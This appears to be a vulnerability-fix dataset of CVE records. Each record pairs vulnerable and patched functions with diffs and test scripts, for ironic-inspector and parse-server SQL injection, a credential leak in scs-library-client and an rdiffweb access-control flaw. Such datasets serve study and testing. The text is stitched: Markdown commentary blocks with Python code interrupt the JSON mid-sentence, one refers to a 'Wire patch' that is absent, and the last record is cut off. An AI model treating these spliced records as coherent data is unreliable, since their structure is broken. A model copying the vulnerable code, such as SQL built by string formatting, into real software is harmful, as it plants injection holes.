node_cache.find_node(). This function makes a SQL query using unfiltered data from a server reporting inspection results (by a POST to the /v1/continue endpoint). Because the API is unauthenticated, the flaw could be exploited by an attacker with access to the network on which ironic-inspector is listening. Because of how ironic-inspector uses the query results, it is unlikely that data could be obtained. However, the attacker could pass malicious data and create a denial of service.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
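The Wire patch above funnels every external open through a `WindowUtil.openExternal` helper that allow-lists URL schemes before handing the URL to the OS. A small Python analogue of that gate; the allow-list follows the patch, and the warning dialog is reduced to a log line:

```python
from urllib.parse import urlparse

def open_external(url: str, https_only: bool = False) -> bool:
    """Return True only for URLs whose scheme is on the allow-list."""
    allowed = {"https"}
    if not https_only:
        allowed.update({"ftp", "http", "mailto"})
    if urlparse(url).scheme not in allowed:
        print(f'Prevented opening external URL "{url}".')  # warn, do not open
        return False
    # A real app would now invoke the platform opener, e.g. webbrowser.open(url).
    return True
```

The key property is default-deny: unknown schemes (`file:`, `smb:`, custom protocol handlers) are blocked instead of being forwarded to `shell.openExternal`.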
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/openstack/ironic-inspector", "patch_url": ["https://github.com/openstack/ironic-inspector/commit/9d107900b2e0b599397b84409580d46e0ed16291", "https://github.com/openstack/ironic-inspector/commit/97f9d34f8376ac7accd2597b3bdce67a9dac664f", "https://github.com/openstack/ironic-inspector/commit/17c796b49171b6133e988f78c92d7c9b7ed3fcf3", "https://github.com/openstack/ironic-inspector/commit/67ff87ebca1016d44bd9d284ec4c16a88a533cfc"], "programing_language": "Python", "vul_func": [{"id": "vul_py_134_1", "commit": "b8d1bda", "file_path": "ironic_inspector/node_cache.py", "start_line": 819, "end_line": 894, "snippet": "def find_node(**attributes):\n \"\"\"Find node in cache.\n\n Looks up a node based on attributes in a best-match fashion.\n This function acquires a lock on a node.\n\n :param attributes: attributes known about this node (like macs, BMC etc)\n also ironic client instance may be passed under 'ironic'\n :returns: structure NodeInfo with attributes ``uuid`` and ``created_at``\n :raises: Error if node is not found or multiple nodes match the attributes\n \"\"\"\n ironic = attributes.pop('ironic', None)\n # NOTE(dtantsur): sorting is not required, but gives us predictability\n found = collections.Counter()\n\n for (name, value) in sorted(attributes.items()):\n if not value:\n LOG.debug('Empty value for attribute %s', name)\n continue\n if not isinstance(value, list):\n value = [value]\n\n LOG.debug('Trying to use %s of value %s for node look up',\n name, value)\n value_list = []\n for v in value:\n value_list.append(\"name='%s' AND value='%s'\" % (name, v))\n stmt = ('select distinct node_uuid from attributes where ' +\n ' OR '.join(value_list))\n rows = (db.model_query(db.Attribute.node_uuid).from_statement(\n text(stmt)).all())\n found.update(row.node_uuid for row in rows)\n\n if not found:\n raise utils.NotFoundInCacheError(_(\n 'Could not find a node for attributes %s') % attributes)\n\n most_common = found.most_common()\n LOG.debug('The following nodes match the attributes: %(attributes)s, '\n 'scoring: %(most_common)s',\n {'most_common': ', '.join('%s: %d' % tpl for tpl in most_common),\n 'attributes': ', '.join('%s=%s' % tpl for tpl in\n attributes.items())})\n\n # NOTE(milan) most_common is sorted, higher scores first\n highest_score = most_common[0][1]\n found = [item[0] for item in most_common if highest_score == item[1]]\n if len(found) > 1:\n raise utils.Error(_(\n 'Multiple nodes match the same number of attributes '\n '%(attr)s: %(found)s')\n % {'attr': attributes, 'found': found}, code=404)\n\n uuid = found.pop()\n node_info = NodeInfo(uuid=uuid, ironic=ironic)\n node_info.acquire_lock()\n\n try:\n row = (db.model_query(db.Node.started_at, db.Node.finished_at).\n filter_by(uuid=uuid).first())\n\n if not row:\n raise utils.Error(_(\n 'Could not find node %s in introspection cache, '\n 'probably it\\'s not on introspection now') % uuid, code=404)\n\n if row.finished_at:\n raise utils.Error(_(\n 'Introspection for node %(node)s already finished on '\n '%(finish)s') % {'node': uuid, 'finish': row.finished_at})\n\n node_info.started_at = row.started_at\n return node_info\n except Exception:\n with excutils.save_and_reraise_exception():\n node_info.release_lock()"}], "fix_func": [{"id": "fix_py_134_1", "commit": "9d10790", "file_path": "ironic_inspector/node_cache.py", 
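In `find_node` above, attribute names and values are pasted straight into the `select distinct node_uuid ...` statement, which is the injection point; the fixed version later in this record rebuilds the lookup from ORM filter expressions OR-ed together. The same remedy expressed with plain placeholders, assuming a table shaped like the attributes table used here:

```python
import sqlite3

def find_node_uuids(conn: sqlite3.Connection, name: str, values: list) -> set:
    """Parameterized lookup: user data is bound, never spliced into SQL text."""
    if not values:
        return set()
    placeholders = " OR ".join(["(name = ? AND value = ?)"] * len(values))
    stmt = f"SELECT DISTINCT node_uuid FROM attributes WHERE {placeholders}"
    params = []
    for value in values:
        params.extend([name, value])
    return {row[0] for row in conn.execute(stmt, params)}
```

Only a constant fragment is repeated to build the WHERE clause; the attacker-controlled strings travel exclusively through the parameter list.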
"start_line": 819, "end_line": 891, "snippet": "def find_node(**attributes):\n \"\"\"Find node in cache.\n\n Looks up a node based on attributes in a best-match fashion.\n This function acquires a lock on a node.\n\n :param attributes: attributes known about this node (like macs, BMC etc)\n also ironic client instance may be passed under 'ironic'\n :returns: structure NodeInfo with attributes ``uuid`` and ``created_at``\n :raises: Error if node is not found or multiple nodes match the attributes\n \"\"\"\n ironic = attributes.pop('ironic', None)\n # NOTE(dtantsur): sorting is not required, but gives us predictability\n found = collections.Counter()\n\n for (name, value) in sorted(attributes.items()):\n if not value:\n LOG.debug('Empty value for attribute %s', name)\n continue\n if not isinstance(value, list):\n value = [value]\n\n LOG.debug('Trying to use %s of value %s for node look up',\n name, value)\n query = db.model_query(db.Attribute.node_uuid)\n pairs = [(db.Attribute.name == name) &\n (db.Attribute.value == v) for v in value]\n query = query.filter(six.moves.reduce(operator.or_, pairs))\n found.update(row.node_uuid for row in query.distinct().all())\n\n if not found:\n raise utils.NotFoundInCacheError(_(\n 'Could not find a node for attributes %s') % attributes)\n\n most_common = found.most_common()\n LOG.debug('The following nodes match the attributes: %(attributes)s, '\n 'scoring: %(most_common)s',\n {'most_common': ', '.join('%s: %d' % tpl for tpl in most_common),\n 'attributes': ', '.join('%s=%s' % tpl for tpl in\n attributes.items())})\n\n # NOTE(milan) most_common is sorted, higher scores first\n highest_score = most_common[0][1]\n found = [item[0] for item in most_common if highest_score == item[1]]\n if len(found) > 1:\n raise utils.Error(_(\n 'Multiple nodes match the same number of attributes '\n '%(attr)s: %(found)s')\n % {'attr': attributes, 'found': found}, code=404)\n\n uuid = found.pop()\n node_info = NodeInfo(uuid=uuid, ironic=ironic)\n node_info.acquire_lock()\n\n try:\n row = (db.model_query(db.Node.started_at, db.Node.finished_at).\n filter_by(uuid=uuid).first())\n\n if not row:\n raise utils.Error(_(\n 'Could not find node %s in introspection cache, '\n 'probably it\\'s not on introspection now') % uuid, code=404)\n\n if row.finished_at:\n raise utils.Error(_(\n 'Introspection for node %(node)s already finished on '\n '%(finish)s') % {'node': uuid, 'finish': row.finished_at})\n\n node_info.started_at = row.started_at\n return node_info\n except Exception:\n with excutils.save_and_reraise_exception():\n node_info.release_lock()"}], "vul_patch": "--- a/ironic_inspector/node_cache.py\n+++ b/ironic_inspector/node_cache.py\n@@ -22,14 +22,11 @@\n \n LOG.debug('Trying to use %s of value %s for node look up',\n name, value)\n- value_list = []\n- for v in value:\n- value_list.append(\"name='%s' AND value='%s'\" % (name, v))\n- stmt = ('select distinct node_uuid from attributes where ' +\n- ' OR '.join(value_list))\n- rows = (db.model_query(db.Attribute.node_uuid).from_statement(\n- text(stmt)).all())\n- found.update(row.node_uuid for row in rows)\n+ query = db.model_query(db.Attribute.node_uuid)\n+ pairs = [(db.Attribute.name == name) &\n+ (db.Attribute.value == v) for v in value]\n+ query = query.filter(six.moves.reduce(operator.or_, pairs))\n+ found.update(row.node_uuid for row in query.distinct().all())\n \n if not found:\n raise utils.NotFoundInCacheError(_(\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-23538", "cve_description": 
"github.com/sylabs/scs-library-client is the Go client for the Singularity Container Services (SCS) Container Library Service. When the scs-library-client is used to pull a container image, with authentication, the HTTP Authorization header sent by the client to the library service may be incorrectly leaked to an S3 backing storage provider. This occurs in a specific flow, where the library service redirects the client to a backing S3 storage server, to perform a multi-part concurrent download. Depending on site configuration, the S3 service may be provided by a third party. An attacker with access to the S3 service may be able to extract user credentials, allowing them to impersonate the user. The vulnerable multi-part concurrent download flow, with redirect to S3, is only used when communicating with a Singularity Enterprise 1.x installation, or third party server implementing this flow. Interaction with Singularity Enterprise 2.x, and Singularity Container Services (cloud.sylabs.io), does not trigger the vulnerable flow. We encourage all users to update. Users who interact with a Singularity Enterprise 1.x installation, using a 3rd party S3 storage service, are advised to revoke and recreate their authentication tokens within Singularity Enterprise. There is no workaround available at this time.", "cwe_info": {"CWE-522": {"name": "Insufficiently Protected Credentials", "description": "The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval."}}, "repo": "https://github.com/sylabs/scs-library-client", "patch_url": ["https://github.com/sylabs/scs-library-client/commit/68ac4cab5cda0afd8758ff5b5e2e57be6a22fcfa"], "programing_language": "Go", "vul_func": [{"id": "vul_go_71_1", "commit": "54fbe14", "file_path": "client/pull.go", "start_line": 106, "end_line": 115, "snippet": "func (c *Client) httpGetRangeRequest(ctx context.Context, url string, start, end int64) (*http.Response, error) {\n\treq, err := c.newRequestWithURL(ctx, http.MethodGet, url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(\"Range\", fmt.Sprintf(\"bytes=%d-%d\", start, end))\n\n\treturn c.HTTPClient.Do(req)\n}"}], "fix_func": [{"id": "fix_go_71_1", "commit": "68ac4cab5cda0afd8758ff5b5e2e57be6a22fcfa", "file_path": "client/pull.go", "start_line": 106, "end_line": 119, "snippet": "func (c *Client) httpGetRangeRequest(ctx context.Context, url string, start, end int64) (*http.Response, error) {\n\treq, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif v := c.UserAgent; v != \"\" {\n\t\treq.Header.Set(\"User-Agent\", v)\n\t}\n\n\treq.Header.Add(\"Range\", fmt.Sprintf(\"bytes=%d-%d\", start, end))\n\n\treturn c.HTTPClient.Do(req)\n}"}], "vul_patch": "--- a/client/pull.go\n+++ b/client/pull.go\n@@ -1,7 +1,11 @@\n func (c *Client) httpGetRangeRequest(ctx context.Context, url string, start, end int64) (*http.Response, error) {\n-\treq, err := c.newRequestWithURL(ctx, http.MethodGet, url, nil)\n+\treq, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)\n \tif err != nil {\n \t\treturn nil, err\n+\t}\n+\n+\tif v := c.UserAgent; v != \"\" {\n+\t\treq.Header.Set(\"User-Agent\", v)\n \t}\n \n \treq.Header.Add(\"Range\", fmt.Sprintf(\"bytes=%d-%d\", start, end))\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-23538:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/scs-library-client\nrm -rf 
./client/pull_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^Test_httpGetRangeRequest_NoAuthHeader$ github.com/sylabs/scs-library-client/client\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-23538:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/scs-library-client\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd client && go test -timeout 30s -v github.com/sylabs/scs-library-client/client\n"} {"cve_id": "CVE-2022-4724", "cve_description": "Improper Access Control in GitHub repository ikus060/rdiffweb prior to 2.5.5.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/ikus060/rdiffweb", "patch_url": ["https://github.com/ikus060/rdiffweb/commit/c4a19cf67d575c4886171b8efcbf4675d51f3929"], "programing_language": "Python", "vul_func": [{"id": "vul_py_54_1", "commit": "d1aaa96", "file_path": "rdiffweb/core/model/__init__.py", "start_line": 70, "end_line": 139, "snippet": "@event.listens_for(Base.metadata, 'after_create')\ndef db_after_create(target, connection, **kw):\n \"\"\"\n Called on database creation to update database schema.\n \"\"\"\n\n if getattr(connection, '_transaction', None):\n connection._transaction.commit()\n\n # Add repo's Encoding\n _column_add(connection, RepoObject.__table__.c.Encoding)\n _column_add(connection, RepoObject.__table__.c.keepdays)\n\n # Create column for roles using \"isadmin\" column. Keep the\n # original column in case we need to revert to previous version.\n if not _column_exists(connection, UserObject.__table__.c.role):\n _column_add(connection, UserObject.__table__.c.role)\n UserObject.query.filter(UserObject._is_admin == 1).update({UserObject.role: UserObject.ADMIN_ROLE})\n\n # Add user's fullname column\n _column_add(connection, UserObject.__table__.c.fullname)\n\n # Add user's mfa column\n _column_add(connection, UserObject.__table__.c.mfa)\n\n # Re-create session table if Number column is missing\n if not _column_exists(connection, SessionObject.__table__.c.Number):\n SessionObject.__table__.drop()\n SessionObject.__table__.create()\n\n if getattr(connection, '_transaction', None):\n connection._transaction.commit()\n\n # Remove preceding and leading slash (/) generated by previous\n # versions. Also rename '.' to ''\n result = RepoObject.query.all()\n for row in result:\n if row.repopath.startswith('/') or row.repopath.endswith('/'):\n row.repopath = row.repopath.strip('/')\n row.commit()\n if row.repopath == '.':\n row.repopath = ''\n row.commit()\n # Remove duplicates and nested repositories.\n result = RepoObject.query.order_by(RepoObject.userid, RepoObject.repopath).all()\n prev_repo = (None, None)\n for row in result:\n if prev_repo[0] == row.userid and (prev_repo[1] == row.repopath or row.repopath.startswith(prev_repo[1] + '/')):\n row.delete()\n else:\n prev_repo = (row.userid, row.repopath)\n\n # Fix username case insensitive unique\n if not _index_exists(connection, 'user_username_index'):\n duplicate_users = (\n UserObject.query.with_entities(func.lower(UserObject.username))\n .group_by(func.lower(UserObject.username))\n .having(func.count(UserObject.username) > 1)\n ).all()\n try:\n user_username_index.create()\n except IntegrityError:\n msg = (\n 'Failure to upgrade your database to make Username case insensitive. 
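The Go fix above builds the ranged download request with a bare `http.NewRequestWithContext`, so the client's Authorization header is no longer attached to requests sent to the redirect target; only Range and an optional User-Agent are set. A Python equivalent of that precaution, assuming the third-party `requests` package:

```python
import requests

def get_part(part_url: str, start: int, end: int, user_agent: str = "") -> bytes:
    """Fetch one byte range from the (possibly third-party) storage URL.

    Headers are built from scratch: no Authorization header and no shared
    session defaults, so library-service credentials cannot leak to S3.
    """
    headers = {"Range": f"bytes={start}-{end}"}
    if user_agent:
        headers["User-Agent"] = user_agent
    resp = requests.get(part_url, headers=headers, timeout=30)
    resp.raise_for_status()
    return resp.content
```

The point is scoping: credentials belong on requests to the library service itself, not on follow-up requests to whatever host the service redirects to.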
'\n 'You must downgrade and deleted duplicate Username. '\n '%s' % '\\n'.join([str(k) for k in duplicate_users]),\n )\n logger.error(msg)\n print(msg, file=sys.stderr)\n raise SystemExit(12)"}, {"id": "vul_py_54_2", "commit": "d1aaa96", "file_path": "rdiffweb/core/model/_user.py", "start_line": 153, "end_line": 185, "snippet": " def add_authorizedkey(self, key, comment=None):\n \"\"\"\n Add the given key to the user. Adding the key to his `authorized_keys`\n file if it exists and adding it to database.\n \"\"\"\n # Parse and validate ssh key\n assert key\n key = authorizedkeys.check_publickey(key)\n\n # Remove option, replace comments.\n key = authorizedkeys.AuthorizedKey(\n options=None, keytype=key.keytype, key=key.key, comment=comment or key.comment\n )\n\n # If a filename exists, use it by default.\n filename = os.path.join(self.user_root, '.ssh', 'authorized_keys')\n if os.path.isfile(filename):\n with open(filename, mode=\"r+\", encoding='utf-8') as fh:\n if authorizedkeys.exists(fh, key):\n raise DuplicateSSHKeyError(_(\"SSH key already exists\"))\n logger.info(\"add key [%s] to [%s] authorized_keys\", key, self.username)\n authorizedkeys.add(fh, key)\n else:\n # Also look in database.\n logger.info(\"add key [%s] to [%s] database\", key, self.username)\n try:\n SshKey(userid=self.userid, fingerprint=key.fingerprint, key=key.getvalue()).add().flush()\n except IntegrityError:\n raise DuplicateSSHKeyError(\n _(\"Duplicate key. This key already exists or is associated to another user.\")\n )\n cherrypy.engine.publish('user_attr_changed', self, {'authorizedkeys': True})\n cherrypy.engine.publish('authorizedkey_added', self, fingerprint=key.fingerprint, comment=comment)"}], "fix_func": [{"id": "fix_py_54_1", "commit": "c4a19cf", "file_path": "rdiffweb/core/model/__init__.py", "start_line": 71, "end_line": 158, "snippet": "def db_after_create(target, connection, **kw):\n \"\"\"\n Called on database creation to update database schema.\n \"\"\"\n\n if getattr(connection, '_transaction', None):\n connection._transaction.commit()\n\n # Add repo's Encoding\n _column_add(connection, RepoObject.__table__.c.Encoding)\n _column_add(connection, RepoObject.__table__.c.keepdays)\n\n # Create column for roles using \"isadmin\" column. Keep the\n # original column in case we need to revert to previous version.\n if not _column_exists(connection, UserObject.__table__.c.role):\n _column_add(connection, UserObject.__table__.c.role)\n UserObject.query.filter(UserObject._is_admin == 1).update({UserObject.role: UserObject.ADMIN_ROLE})\n\n # Add user's fullname column\n _column_add(connection, UserObject.__table__.c.fullname)\n\n # Add user's mfa column\n _column_add(connection, UserObject.__table__.c.mfa)\n\n # Re-create session table if Number column is missing\n if not _column_exists(connection, SessionObject.__table__.c.Number):\n SessionObject.__table__.drop()\n SessionObject.__table__.create()\n\n if getattr(connection, '_transaction', None):\n connection._transaction.commit()\n\n # Remove preceding and leading slash (/) generated by previous\n # versions. Also rename '.' 
to ''\n result = RepoObject.query.all()\n for row in result:\n if row.repopath.startswith('/') or row.repopath.endswith('/'):\n row.repopath = row.repopath.strip('/')\n row.commit()\n if row.repopath == '.':\n row.repopath = ''\n row.commit()\n # Remove duplicates and nested repositories.\n result = RepoObject.query.order_by(RepoObject.userid, RepoObject.repopath).all()\n prev_repo = (None, None)\n for row in result:\n if prev_repo[0] == row.userid and (prev_repo[1] == row.repopath or row.repopath.startswith(prev_repo[1] + '/')):\n row.delete()\n else:\n prev_repo = (row.userid, row.repopath)\n\n # Fix username case insensitive unique\n if not _index_exists(connection, 'user_username_index'):\n duplicate_users = (\n UserObject.query.with_entities(func.lower(UserObject.username))\n .group_by(func.lower(UserObject.username))\n .having(func.count(UserObject.username) > 1)\n ).all()\n try:\n user_username_index.create()\n except IntegrityError:\n msg = (\n 'Failure to upgrade your database to make Username case insensitive. '\n 'You must downgrade and deleted duplicate Username. '\n '%s' % '\\n'.join([str(k) for k in duplicate_users]),\n )\n logger.error(msg)\n print(msg, file=sys.stderr)\n raise SystemExit(12)\n\n # Fix SSH Key uniqueness - since 2.5.4\n if not _index_exists(connection, 'sshkey_fingerprint_index'):\n duplicate_sshkeys = (\n SshKey.query.with_entities(SshKey.fingerprint)\n .group_by(SshKey.fingerprint)\n .having(func.count(SshKey.fingerprint) > 1)\n ).all()\n try:\n sshkey_fingerprint_index.create()\n except IntegrityError:\n msg = (\n 'Failure to upgrade your database to make SSH Keys unique. '\n 'You must downgrade and deleted duplicate SSH Keys. '\n '%s' % '\\n'.join([str(k) for k in duplicate_sshkeys]),\n )\n logger.error(msg)\n print(msg, file=sys.stderr)\n raise SystemExit(12)"}, {"id": "fix_py_54_2", "commit": "c4a19cf", "file_path": "rdiffweb/core/model/_sshkey.py", "start_line": 24, "end_line": 33, "snippet": "class SshKey(Base):\n __tablename__ = 'sshkeys'\n __table_args__ = {'sqlite_autoincrement': True}\n fingerprint = Column('Fingerprint', Text)\n key = Column('Key', Text, unique=True, primary_key=True)\n userid = Column('UserID', Integer, nullable=False)\n\n\n# Make finger print unique\nsshkey_fingerprint_index = Index('sshkey_fingerprint_index', SshKey.fingerprint, unique=True)"}, {"id": "fix_py_54_3", "commit": "c4a19cf", "file_path": "rdiffweb/core/model/_user.py", "start_line": 153, "end_line": 186, "snippet": " def add_authorizedkey(self, key, comment=None):\n \"\"\"\n Add the given key to the user. 
Adding the key to his `authorized_keys`\n file if it exists and adding it to database.\n \"\"\"\n # Parse and validate ssh key\n assert key\n key = authorizedkeys.check_publickey(key)\n\n # Remove option & Remove comment for SQL storage\n key = authorizedkeys.AuthorizedKey(\n options=None, keytype=key.keytype, key=key.key, comment=comment or key.comment\n )\n\n # If a filename exists, use it by default.\n filename = os.path.join(self.user_root, '.ssh', 'authorized_keys')\n if os.path.isfile(filename):\n with open(filename, mode=\"r+\", encoding='utf-8') as fh:\n if authorizedkeys.exists(fh, key):\n raise DuplicateSSHKeyError(_(\"SSH key already exists\"))\n logger.info(\"add key [%s] to [%s] authorized_keys\", key, self.username)\n authorizedkeys.add(fh, key)\n else:\n # Also look in database.\n logger.info(\"add key [%s] to [%s] database\", key, self.username)\n try:\n sshkey = SshKey(userid=self.userid, fingerprint=key.fingerprint, key=key.getvalue())\n sshkey.add().flush()\n except IntegrityError:\n raise DuplicateSSHKeyError(\n _(\"Duplicate key. This key already exists or is associated to another user.\")\n )\n cherrypy.engine.publish('user_attr_changed', self, {'authorizedkeys': True})\n cherrypy.engine.publish('authorizedkey_added', self, fingerprint=key.fingerprint, comment=comment)"}], "vul_patch": "--- a/rdiffweb/core/model/__init__.py\n+++ b/rdiffweb/core/model/__init__.py\n@@ -1,4 +1,3 @@\n-@event.listens_for(Base.metadata, 'after_create')\n def db_after_create(target, connection, **kw):\n \"\"\"\n Called on database creation to update database schema.\n@@ -68,3 +67,22 @@\n logger.error(msg)\n print(msg, file=sys.stderr)\n raise SystemExit(12)\n+\n+ # Fix SSH Key uniqueness - since 2.5.4\n+ if not _index_exists(connection, 'sshkey_fingerprint_index'):\n+ duplicate_sshkeys = (\n+ SshKey.query.with_entities(SshKey.fingerprint)\n+ .group_by(SshKey.fingerprint)\n+ .having(func.count(SshKey.fingerprint) > 1)\n+ ).all()\n+ try:\n+ sshkey_fingerprint_index.create()\n+ except IntegrityError:\n+ msg = (\n+ 'Failure to upgrade your database to make SSH Keys unique. '\n+ 'You must downgrade and deleted duplicate SSH Keys. '\n+ '%s' % '\\n'.join([str(k) for k in duplicate_sshkeys]),\n+ )\n+ logger.error(msg)\n+ print(msg, file=sys.stderr)\n+ raise SystemExit(12)\n\n--- a/rdiffweb/core/model/_user.py\n+++ b/rdiffweb/core/model/_sshkey.py\n@@ -1,33 +1,10 @@\n- def add_authorizedkey(self, key, comment=None):\n- \"\"\"\n- Add the given key to the user. 
Adding the key to his `authorized_keys`\n- file if it exists and adding it to database.\n- \"\"\"\n- # Parse and validate ssh key\n- assert key\n- key = authorizedkeys.check_publickey(key)\n+class SshKey(Base):\n+ __tablename__ = 'sshkeys'\n+ __table_args__ = {'sqlite_autoincrement': True}\n+ fingerprint = Column('Fingerprint', Text)\n+ key = Column('Key', Text, unique=True, primary_key=True)\n+ userid = Column('UserID', Integer, nullable=False)\n \n- # Remove option, replace comments.\n- key = authorizedkeys.AuthorizedKey(\n- options=None, keytype=key.keytype, key=key.key, comment=comment or key.comment\n- )\n \n- # If a filename exists, use it by default.\n- filename = os.path.join(self.user_root, '.ssh', 'authorized_keys')\n- if os.path.isfile(filename):\n- with open(filename, mode=\"r+\", encoding='utf-8') as fh:\n- if authorizedkeys.exists(fh, key):\n- raise DuplicateSSHKeyError(_(\"SSH key already exists\"))\n- logger.info(\"add key [%s] to [%s] authorized_keys\", key, self.username)\n- authorizedkeys.add(fh, key)\n- else:\n- # Also look in database.\n- logger.info(\"add key [%s] to [%s] database\", key, self.username)\n- try:\n- SshKey(userid=self.userid, fingerprint=key.fingerprint, key=key.getvalue()).add().flush()\n- except IntegrityError:\n- raise DuplicateSSHKeyError(\n- _(\"Duplicate key. This key already exists or is associated to another user.\")\n- )\n- cherrypy.engine.publish('user_attr_changed', self, {'authorizedkeys': True})\n- cherrypy.engine.publish('authorizedkey_added', self, fingerprint=key.fingerprint, comment=comment)\n+# Make finger print unique\n+sshkey_fingerprint_index = Index('sshkey_fingerprint_index', SshKey.fingerprint, unique=True)\n\n--- /dev/null\n+++ b/rdiffweb/core/model/_sshkey.py\n@@ -0,0 +1,34 @@\n+ def add_authorizedkey(self, key, comment=None):\n+ \"\"\"\n+ Add the given key to the user. Adding the key to his `authorized_keys`\n+ file if it exists and adding it to database.\n+ \"\"\"\n+ # Parse and validate ssh key\n+ assert key\n+ key = authorizedkeys.check_publickey(key)\n+\n+ # Remove option & Remove comment for SQL storage\n+ key = authorizedkeys.AuthorizedKey(\n+ options=None, keytype=key.keytype, key=key.key, comment=comment or key.comment\n+ )\n+\n+ # If a filename exists, use it by default.\n+ filename = os.path.join(self.user_root, '.ssh', 'authorized_keys')\n+ if os.path.isfile(filename):\n+ with open(filename, mode=\"r+\", encoding='utf-8') as fh:\n+ if authorizedkeys.exists(fh, key):\n+ raise DuplicateSSHKeyError(_(\"SSH key already exists\"))\n+ logger.info(\"add key [%s] to [%s] authorized_keys\", key, self.username)\n+ authorizedkeys.add(fh, key)\n+ else:\n+ # Also look in database.\n+ logger.info(\"add key [%s] to [%s] database\", key, self.username)\n+ try:\n+ sshkey = SshKey(userid=self.userid, fingerprint=key.fingerprint, key=key.getvalue())\n+ sshkey.add().flush()\n+ except IntegrityError:\n+ raise DuplicateSSHKeyError(\n+ _(\"Duplicate key. 
This key already exists or is associated to another user.\")\n+ )\n+ cherrypy.engine.publish('user_attr_changed', self, {'authorizedkeys': True})\n+ cherrypy.engine.publish('authorizedkey_added', self, fingerprint=key.fingerprint, comment=comment)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-4724:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/rdiffweb\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-4724/bin/python -m pytest rdiffweb/core/model/tests/test_user.py -k \"test_add_authorizedkey_duplicate\" -p no:warning --disable-warnings --import-mode=importlib\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-4724:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/rdiffweb\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-4724/bin/python -m pytest rdiffweb/core/model/tests/test_user.py -p no:warning --disable-warnings --import-mode=importlib\n"} {"cve_id": "CVE-2024-27298", "cve_description": "parse-server is a Parse Server for Node.js / Express. This vulnerability allows SQL injection when Parse Server is configured to use the PostgreSQL database. The vulnerability has been fixed in 6.5.0 and 7.0.0-alpha.20.\n", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/parse-community/parse-server", "patch_url": ["https://github.com/parse-community/parse-server/commit/cbefe770a7260b54748a058b8a7389937dc35833", "https://github.com/parse-community/parse-server/commit/a6e654943536932904a69b51e513507fcf90a504"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_96_1", "commit": "9c85e63", "file_path": "src/Adapters/Storage/Postgres/PostgresStorageAdapter.js", "start_line": "2632", "end_line": "2661", "snippet": "function literalizeRegexPart(s: string) {\n const matcher1 = /\\\\Q((?!\\\\E).*)\\\\E$/;\n const result1: any = s.match(matcher1);\n if (result1 && result1.length > 1 && result1.index > -1) {\n // process regex that has a beginning and an end specified for the literal text\n const prefix = s.substring(0, result1.index);\n const remaining = result1[1];\n\n return literalizeRegexPart(prefix) + createLiteralRegex(remaining);\n }\n\n // process regex that has a beginning specified for the literal text\n const matcher2 = /\\\\Q((?!\\\\E).*)$/;\n const result2: any = s.match(matcher2);\n if (result2 && result2.length > 1 && result2.index > -1) {\n const prefix = s.substring(0, result2.index);\n const remaining = result2[1];\n\n return literalizeRegexPart(prefix) + createLiteralRegex(remaining);\n }\n\n // remove all instances of \\Q and \\E from the remaining text & escape single quotes\n return s\n .replace(/([^\\\\])(\\\\E)/, '$1')\n .replace(/([^\\\\])(\\\\Q)/, '$1')\n .replace(/^\\\\E/, '')\n .replace(/^\\\\Q/, '')\n .replace(/([^'])'/, `$1''`)\n .replace(/^'([^'])/, `''$1`);\n}"}], "fix_func": [{"id": "fix_js_96_1", "commit": "cbefe77", 
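The rdiffweb record (CVE-2022-4724) above closes the gap by enforcing SSH-key uniqueness at the database layer: a unique fingerprint index makes duplicate registrations a hard integrity error instead of an access-control bypass. A minimal sketch of that pattern with SQLAlchemy; the in-memory sqlite engine and Session wiring are illustrative only and not part of rdiffweb.

from sqlalchemy import Column, Index, Integer, Text, create_engine
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm import Session, declarative_base

Base = declarative_base()

class SshKey(Base):
    __tablename__ = "sshkeys"
    fingerprint = Column("Fingerprint", Text)
    key = Column("Key", Text, unique=True, primary_key=True)
    userid = Column("UserID", Integer, nullable=False)

# Same shape as sshkey_fingerprint_index in the patch: duplicates become
# IntegrityError at flush time, regardless of application-level checks.
sshkey_fingerprint_index = Index("sshkey_fingerprint_index", SshKey.fingerprint, unique=True)

engine = create_engine("sqlite://")
Base.metadata.create_all(engine)

with Session(engine) as session:
    session.add(SshKey(userid=1, fingerprint="SHA256:aaaa", key="ssh-ed25519 AAAA... a@host"))
    session.commit()
    session.add(SshKey(userid=2, fingerprint="SHA256:aaaa", key="ssh-ed25519 BBBB... b@host"))
    try:
        session.commit()
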